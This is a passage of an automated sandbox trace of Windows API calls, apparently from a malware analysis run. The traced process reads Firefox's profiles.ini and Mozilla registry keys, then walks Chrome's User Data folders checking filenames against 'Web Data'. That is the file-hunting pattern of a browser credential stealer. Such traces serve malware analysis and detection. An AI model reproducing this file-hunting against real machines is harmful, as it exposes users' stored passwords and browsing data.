hFindFile=0x57ca60, lpFindFileData=0x52dd8c | out: lpFindFileData=0x52dd8c) returned 0 [0590.032] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.032] LocalFree (hMem=0x5500d0) returned 0x0 [0590.032] LocalFree (hMem=0x5a1300) returned 0x0 [0590.032] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e004 | out: lpFindFileData=0x52e004) returned 1 [0590.032] lstrlenW (lpString="\\") returned 1 [0590.032] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.032] LocalAlloc (uFlags=0x40, uBytes=0xe8) returned 0x2ed2ba0 [0590.032] lstrlenW (lpString="profiles.ini") returned 12 [0590.032] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned 51 [0590.032] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x5a1300 [0590.032] LocalFree (hMem=0x2ed2ba0) returned 0x0 [0590.032] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.032] CloseHandle (hObject=0x5ac) returned 1 [0590.032] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x40 [0590.032] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x5500d0 [0590.032] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini", lpDst=0x5500d0, nSize=0x40 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini") returned 0x40 [0590.032] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.032] CloseHandle (hObject=0x5ac) returned 1 [0590.033] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.033] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6f [0590.033] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.033] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.033] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.033] CloseHandle (hObject=0x4c8) returned 1 [0590.033] CloseHandle (hObject=0x5ac) returned 1 [0590.033] LocalFree (hMem=0x5500d0) returned 0x0 [0590.033] LocalFree (hMem=0x5a1300) returned 0x0 [0590.033] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e004 | out: lpFindFileData=0x52e004) returned 0 [0590.033] FindClose (in: hFindFile=0x57d1e0 | out: hFindFile=0x57d1e0) returned 1 [0590.033] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.033] LocalFree (hMem=0x2ed2150) returned 0x0 [0590.033] LocalFree (hMem=0x2ed2060) returned 0x0 [0590.033] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0590.033] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5eb208 [0590.033] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\bin", phkResult=0x52e2ac | out: phkResult=0x52e2ac*=0x664) returned 0x0 [0590.033] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x5eb208, lpcchName=0x52e2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.034] RegCloseKey (hKey=0x664) returned 0x0 [0590.034] LocalFree (hMem=0x5eb208) returned 0x0 [0590.034] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.034] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x1, lpName=0x5e6108, lpcchName=0x52e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="extensions", lpcchName=0x52e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.034] lstrlenW (lpString="\\") returned 1 [0590.034] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0") returned 37 [0590.034] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x597878 [0590.034] lstrlenW (lpString="extensions") returned 10 [0590.034] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned 38 [0590.034] LocalAlloc (uFlags=0x40, uBytes=0xe2) returned 0x2ed2ab0 [0590.034] LocalFree (hMem=0x597878) returned 0x0 [0590.034] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", lpSrch="Firefox") returned="Firefox 25.0\\extensions" [0590.034] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e284 | out: phkResult=0x52e284*=0x664) returned 0x0 [0590.034] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e26c, lpData=0x0, lpcbData=0x52e280*=0x0 | out: lpType=0x52e26c*=0x0, lpData=0x0, lpcbData=0x52e280*=0x0) returned 0x2 [0590.034] RegCloseKey (hKey=0x664) returned 0x0 [0590.034] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e258 | out: phkResult=0x52e258*=0x664) returned 0x0 [0590.034] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e240, lpData=0x0, lpcbData=0x52e254*=0x0 | out: lpType=0x52e240*=0x0, lpData=0x0, lpcbData=0x52e254*=0x0) returned 0x2 [0590.034] RegCloseKey (hKey=0x664) returned 0x0 [0590.034] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e22c | out: phkResult=0x52e22c*=0x0) returned 0x2 [0590.034] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5eb208 [0590.034] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", phkResult=0x52e2ac | out: phkResult=0x52e2ac*=0x664) returned 0x0 [0590.034] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x5eb208, lpcchName=0x52e2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.034] RegCloseKey (hKey=0x664) returned 0x0 [0590.034] LocalFree (hMem=0x5eb208) returned 0x0 [0590.034] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0590.034] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x2, lpName=0x5e6108, lpcchName=0x52e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="extensions", lpcchName=0x52e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.034] RegCloseKey (hKey=0x4d0) returned 0x0 [0590.034] LocalFree (hMem=0x5e6108) returned 0x0 [0590.034] LocalFree (hMem=0x5977a0) returned 0x0 [0590.034] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x3, lpName=0x5e5080, lpcchName=0x52e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x52e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.034] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.034] LocalFree (hMem=0x5e5080) returned 0x0 [0590.034] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x578b10 [0590.035] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x578b10 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0590.035] lstrlenW (lpString="\\Google\\Chrome") returned 14 [0590.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0590.035] LocalAlloc (uFlags=0x40, uBytes=0xe0) returned 0x2ed0060 [0590.035] LocalFree (hMem=0x578b10) returned 0x0 [0590.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Google\\Chrome") returned 47 [0590.035] lstrlenW (lpString="\\*.*") returned 4 [0590.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Google\\Chrome") returned 47 [0590.035] LocalAlloc (uFlags=0x40, uBytes=0xe8) returned 0x2ed2ab0 [0590.035] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Google\\Chrome\\*.*", lpFindFileData=0x52e0bc | out: lpFindFileData=0x52e0bc) returned 0xffffffff [0590.035] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0590.035] LocalFree (hMem=0x2ed0060) returned 0x0 [0590.035] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x578b10 [0590.035] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x578b10 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0590.035] lstrlenW (lpString="\\Google\\Chrome") returned 14 [0590.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0590.035] LocalAlloc (uFlags=0x40, uBytes=0xe0) returned 0x2ed0060 [0590.035] LocalFree (hMem=0x578b10) returned 0x0 [0590.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Google\\Chrome") returned 47 [0590.035] lstrlenW (lpString="\\*.*") returned 4 [0590.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Google\\Chrome") returned 47 [0590.035] LocalAlloc (uFlags=0x40, uBytes=0xe8) returned 0x2ed2ab0 [0590.035] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Google\\Chrome\\*.*", lpFindFileData=0x52e0ac | out: lpFindFileData=0x52e0ac) returned 0xffffffff [0590.035] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0590.035] LocalFree (hMem=0x2ed0060) returned 0x0 [0590.035] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x578b10 [0590.035] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x578b10 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0590.035] lstrlenW (lpString="\\Google\\Chrome") returned 14 [0590.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0590.035] LocalAlloc (uFlags=0x40, uBytes=0xdc) returned 0x2ed0060 [0590.035] LocalFree (hMem=0x578b10) returned 0x0 [0590.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome") returned 45 [0590.035] lstrlenW (lpString="\\*.*") returned 4 [0590.035] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome") returned 45 [0590.035] LocalAlloc (uFlags=0x40, uBytes=0xe4) returned 0x2ed2ab0 [0590.035] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\*.*", lpFindFileData=0x52e09c | out: lpFindFileData=0x52e09c) returned 0x57d1e0 [0590.041] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.041] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e09c | out: lpFindFileData=0x52e09c) returned 1 [0590.041] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.041] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.041] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e09c | out: lpFindFileData=0x52e09c) returned 1 [0590.041] lstrcmpiW (lpString1="User Data", lpString2=".") returned 1 [0590.041] lstrcmpiW (lpString1="User Data", lpString2="..") returned 1 [0590.041] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome") returned 45 [0590.041] lstrlenW (lpString="\\") returned 1 [0590.041] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome") returned 45 [0590.041] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0148 [0590.041] lstrlenW (lpString="User Data") returned 9 [0590.041] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\") returned 46 [0590.041] LocalAlloc (uFlags=0x40, uBytes=0xf0) returned 0x5d7c90 [0590.041] LocalFree (hMem=0x2ed0148) returned 0x0 [0590.041] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.041] lstrlenW (lpString="\\*.*") returned 4 [0590.041] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.041] LocalAlloc (uFlags=0x40, uBytes=0xf8) returned 0x5a1300 [0590.041] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 0x57ca60 [0590.042] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.042] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 1 [0590.042] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.042] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.042] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 1 [0590.042] lstrcmpiW (lpString1="CertificateTransparency", lpString2=".") returned 1 [0590.042] lstrcmpiW (lpString1="CertificateTransparency", lpString2="..") returned 1 [0590.042] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.042] lstrlenW (lpString="\\") returned 1 [0590.042] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.042] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5500d0 [0590.042] lstrlenW (lpString="CertificateTransparency") returned 23 [0590.042] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.042] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x5e7090 [0590.042] LocalFree (hMem=0x5500d0) returned 0x0 [0590.042] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 79 [0590.042] lstrlenW (lpString="\\*.*") returned 4 [0590.042] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 79 [0590.042] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x5500d0 [0590.042] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*.*", lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0x57c9a0 [0590.043] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.043] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.043] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.043] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.043] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0 [0590.043] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.043] LocalFree (hMem=0x5500d0) returned 0x0 [0590.043] LocalFree (hMem=0x5e7090) returned 0x0 [0590.043] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 1 [0590.043] lstrcmpiW (lpString1="Crashpad", lpString2=".") returned 1 [0590.043] lstrcmpiW (lpString1="Crashpad", lpString2="..") returned 1 [0590.043] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.043] lstrlenW (lpString="\\") returned 1 [0590.043] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.043] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5500d0 [0590.043] lstrlenW (lpString="Crashpad") returned 8 [0590.043] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.043] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0c00 [0590.043] LocalFree (hMem=0x5500d0) returned 0x0 [0590.043] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0590.043] lstrlenW (lpString="\\*.*") returned 4 [0590.043] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0590.043] LocalAlloc (uFlags=0x40, uBytes=0x10a) returned 0x5d0d18 [0590.043] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*.*", lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0x57c9a0 [0590.044] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.044] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.044] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.044] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.044] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.044] lstrlenW (lpString="\\") returned 1 [0590.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0590.044] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5d0e30 [0590.044] lstrlenW (lpString="metadata") returned 8 [0590.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned 65 [0590.044] LocalAlloc (uFlags=0x40, uBytes=0x114) returned 0x5500d0 [0590.044] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.044] StrStrIW (lpFirst="metadata", lpSrch="Web Data") returned 0x0 [0590.044] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.044] lstrcmpiW (lpString1="reports", lpString2=".") returned 1 [0590.044] lstrcmpiW (lpString1="reports", lpString2="..") returned 1 [0590.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0590.044] lstrlenW (lpString="\\") returned 1 [0590.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0590.044] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5d0e30 [0590.044] lstrlenW (lpString="reports") returned 7 [0590.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned 65 [0590.044] LocalAlloc (uFlags=0x40, uBytes=0x112) returned 0x5e7090 [0590.044] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned 72 [0590.044] lstrlenW (lpString="\\*.*") returned 4 [0590.044] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned 72 [0590.044] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0590.044] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*.*", lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 0x5b9b50 [0590.045] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.045] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.045] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.045] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.045] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 0 [0590.045] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.045] LocalFree (hMem=0x59a8a0) returned 0x0 [0590.045] LocalFree (hMem=0x5e7090) returned 0x0 [0590.045] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.045] lstrlenW (lpString="\\") returned 1 [0590.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0590.045] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5d0e30 [0590.045] lstrlenW (lpString="settings.dat") returned 12 [0590.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned 65 [0590.045] LocalAlloc (uFlags=0x40, uBytes=0x11c) returned 0x5e7090 [0590.045] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.045] StrStrIW (lpFirst="settings.dat", lpSrch="Web Data") returned 0x0 [0590.045] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0 [0590.045] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.045] LocalFree (hMem=0x5d0d18) returned 0x0 [0590.045] LocalFree (hMem=0x5d0c00) returned 0x0 [0590.045] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 1 [0590.045] lstrlenW (lpString="\\") returned 1 [0590.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.045] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x59a8a0 [0590.045] lstrlenW (lpString="CrashpadMetrics-active.pma") returned 26 [0590.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.045] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x578b10 [0590.045] LocalFree (hMem=0x59a8a0) returned 0x0 [0590.045] StrStrIW (lpFirst="CrashpadMetrics-active.pma", lpSrch="Web Data") returned 0x0 [0590.045] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 1 [0590.045] lstrcmpiW (lpString1="Default", lpString2=".") returned 1 [0590.045] lstrcmpiW (lpString1="Default", lpString2="..") returned 1 [0590.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.045] lstrlenW (lpString="\\") returned 1 [0590.045] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.045] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x59a8a0 [0590.046] lstrlenW (lpString="Default") returned 7 [0590.046] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.046] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x578c40 [0590.046] LocalFree (hMem=0x59a8a0) returned 0x0 [0590.046] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.046] lstrlenW (lpString="\\*.*") returned 4 [0590.046] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.046] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5d0c00 [0590.046] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*.*", lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0x57c9a0 [0590.047] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.047] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.047] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.047] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.047] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.047] lstrcmpiW (lpString1="Cache", lpString2=".") returned 1 [0590.047] lstrcmpiW (lpString1="Cache", lpString2="..") returned 1 [0590.047] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.047] lstrlenW (lpString="\\") returned 1 [0590.047] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.047] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0d18 [0590.047] lstrlenW (lpString="Cache") returned 5 [0590.047] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.047] LocalAlloc (uFlags=0x40, uBytes=0x10c) returned 0x5d0e30 [0590.047] LocalFree (hMem=0x5d0d18) returned 0x0 [0590.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0590.048] lstrlenW (lpString="\\*.*") returned 4 [0590.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0590.048] LocalAlloc (uFlags=0x40, uBytes=0x114) returned 0x59a8a0 [0590.048] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*.*", lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 0x5b9b50 [0590.048] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.048] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.048] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.048] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.048] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.048] lstrlenW (lpString="\\") returned 1 [0590.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0590.048] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5d0d18 [0590.048] lstrlenW (lpString="data_0") returned 6 [0590.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 70 [0590.048] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5e1d10 [0590.048] LocalFree (hMem=0x5d0d18) returned 0x0 [0590.048] StrStrIW (lpFirst="data_0", 